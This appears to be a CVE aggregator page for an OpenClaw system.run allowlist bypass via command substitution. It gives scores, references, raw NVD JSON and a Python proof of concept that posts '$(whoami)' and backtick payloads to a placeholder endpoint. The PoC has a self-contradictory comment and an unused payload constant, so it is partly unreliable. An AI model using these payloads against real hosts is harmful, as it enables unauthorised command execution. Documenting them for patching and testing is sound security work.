CVE-2026-22179

Description

OpenClaw versions prior to 2026.2.22 in macOS node-host system.run contain an allowlist bypass vulnerability that allows remote attackers to execute non-allowlisted commands by exploiting improper parsing of command substitution tokens. Attackers can craft shell payloads with command substitution syntax within double-quoted text to bypass security restrictions and execute arbitrary commands on the system.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE

OpenClaw < 2026.2.22 (macOS node-host system.run)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-22179 PoC - OpenClaw system.run Command Substitution Bypass
# This PoC demonstrates how command substitution can bypass allowlist restrictions

import requests
import json

# Target configuration
TARGET_URL = "http://target-host:8080/api/system/run"
VULNERABLE_PAYLOAD = '$(whoami > /tmp/pwned)'  # Command substitution in double quotes

# The vulnerable input format that bypasses allowlist
def craft_malicious_input():
    """
    OpenClaw's system.run has an allowlist for permitted commands.
    This PoC shows how command substitution bypasses the allowlist.
    """
    
    # Normal allowlisted command (would be blocked)
    normal_cmd = "whoami"
    
    # Bypassed command using substitution in quoted text
    # The system.run parser treats this as a string, but shell executes the substitution
    bypass_payload = 'echo "$(whoami)"'
    
    # Alternative using backticks
    bypass_payload_alt = 'echo "`id`"'
    
    return bypass_payload

def exploit(target_url, payload):
    """
    Send the malicious payload to vulnerable system.run endpoint
    """
    headers = {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer <valid-token-with-priviliges>'
    }
    
    data = {
        'command': payload,
        'args': [],
        'timeout': 30
    }
    
    try:
        response = requests.post(target_url, json=data, headers=headers, timeout=10)
        print(f"Status: {response.status_code}")
        print(f"Response: {response.text}")
        
        # Check if command was executed
        if response.status_code == 200:
            result = response.json()
            if 'output' in result:
                print("\n[!] Command executed successfully!")
                print(f"Output: {result['output']}")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    payload = craft_malicious_input()
    print(f"[*] Sending payload: {payload}")
    exploit(TARGET_URL, payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22179
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22179
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22179/
[4] VulDB https://vuldb.com/cve/CVE-2026-22179
[5] https://github.com/openclaw/openclaw/commit/90a378ca3a9ecbf1634cd247f17a35f4612c6ca6
[6] https://github.com/openclaw/openclaw/security/advisories/GHSA-9p38-94jf-hgjj
[7] https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-command-substitution-in-system-run

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22179", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:22.377", "lastModified": "2026-03-25T15:16:36.730", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.22 in macOS node-host system.run contain an allowlist bypass vulnerability that allows remote attackers to execute non-allowlisted commands by exploiting improper parsing of command substitution tokens. Attackers can craft shell payloads with command substitution syntax within double-quoted text to bypass security restrictions and execute arbitrary commands on the system."}, {"lang": "es", "value": "Versiones de OpenClaw anteriores a la 2026.2.22 en el system.run del host de nodo de macOS contienen una vulnerabilidad de omisión de lista de permitidos que permite a atacantes remotos ejecutar comandos no incluidos en la lista de permitidos explotando un análisis incorrecto de tokens de sustitución de comandos. Los atacantes pueden crear cargas útiles de shell con sintaxis de sustitución de comandos dentro de texto entre comillas dobles para omitir restricciones de seguridad y ejecutar comandos arbitrarios en el sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.7, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.22", "matchCriteriaId": "6EA3E555-7328-4665-9FBC-BF4357239EDF"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/90a378ca3a9ecbf1634cd247f17a35f4612c6ca6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9p38-94jf-hgjj", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-command-substitution-in-system-run", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}